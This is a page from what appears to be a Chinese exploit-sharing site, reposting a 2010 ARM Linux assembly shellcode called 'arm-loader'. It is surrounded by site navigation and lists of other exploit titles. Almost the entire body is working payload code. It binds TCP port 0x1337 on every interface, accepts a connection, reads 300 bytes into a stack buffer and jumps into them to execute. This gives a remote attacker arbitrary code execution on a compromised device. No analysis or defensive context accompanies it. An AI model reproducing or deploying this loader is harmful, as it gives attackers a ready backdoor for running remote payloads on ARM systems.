首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ARM Loader Port 0x1337
来源:gmail account dgodas 作者:Daniel 发布时间:2010-10-26  

/*
 * Title: arm-loader
 * Brief: Bind port 0x1337 on any local interface, listen for a connection
 *        receive a payload, and pass execution to it
 * Author: Daniel Godas-Lopez <gmail account dgodas>
 */

 /*
   soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  */

 mov %r0, $2  /* AF_INET */
 mov %r1, $1  /* SOCK_STREAM */
 mov %r2, $6  /* IPPRTOTO_TCP */
 push {%r0, %r1, %r2}
 mov %r0, $1  /* socket */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $12

 mov %r6, %r0  /* r6 = soc_des */

 /*
   bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
  */

.if 0 /* r0 == r6 already */
 mov %r0, %r6  /* soc_des */
.endif

 mov %r1, $0x37
 mov %r7, $0x13
 mov %r1, %r1, lsl $24
 add %r1, %r7, lsl $16
 add %r1, $2  /* port = 0x1337, family = 2 (AF_INET) */
 sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
 push {%r1, %r2}
 mov %r1, %sp  /* pointer to sockaddr_in */
 mov %r2, $16  /* sizeof(struct sockaddr_in) */
 
 push {%r0, %r1, %r2}
 mov %r0, $2  /* bind */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $20

 /*
   listen(soc_des, 1);
  /*

 mov %r1, $1  /* backlog (see man 2 listen) */
 mov %r0, %r6  /* soc_des */
 push {%r0, %r1}
 mov %r0, $4  /* listen */
 mov %r1, %sp
 svc 0x00900066
 add %sp, $8

 /*
   soc_cli = accept(soc_des, 0, 0);
  */

 mov %r0, %r6  /* soc_des */
 sub %r1, %r1, %r1
 sub %r2, %r2, %r2
 push {%r0, %r1, %r2}
 mov %r0, $5  /* accept */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $12

 mov %r6, %r0  /* r6 = soc_cli */

 /*
   recv(soc_des, buff, len, flags);
  */

 sub %r4, %sp, $316 /* buffer on the stack + 16 bytes padding */
 sub %r5, %r5, %r5 /* byte count */

1: mov %r0, %r6
 add %r1, %r4, %r5 /* dst pointer */
 mov %r2, $300  /* 300 bytes */
 mov %r3, $256  /* MSG_WAITALL */
 push {%r0, %r1, %r2, %r3}

 mov %r0, $10  /* recv */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $16
 add %r5, %r0
 cmp %r5, $300
 bne 1b

 /*
   Jump into code
  */

 mov %pc, %r4


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ARM Bind Connect UDP Port 68
·ARM ifconfig eth0 and Assign A
·ARM Bindshell port 0x1337
·Winamp 5.5.8.2985 (in_mod plug
·Linux Kernel 2.6.32 Local Root
·NitroSecurity ESM v8.4.0a Remo
·Jamb CSRF Arbitrary Add a Post
·Apache 2.2 (Windows) Local Den
·HP Data Protector Media Operat
·Bigace_2.7.3 CSRF Change Admin
·AnyDVD <= 6.7.1.0 Denial Of Se
·RarmaRadio v2.52 (.m3u) Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved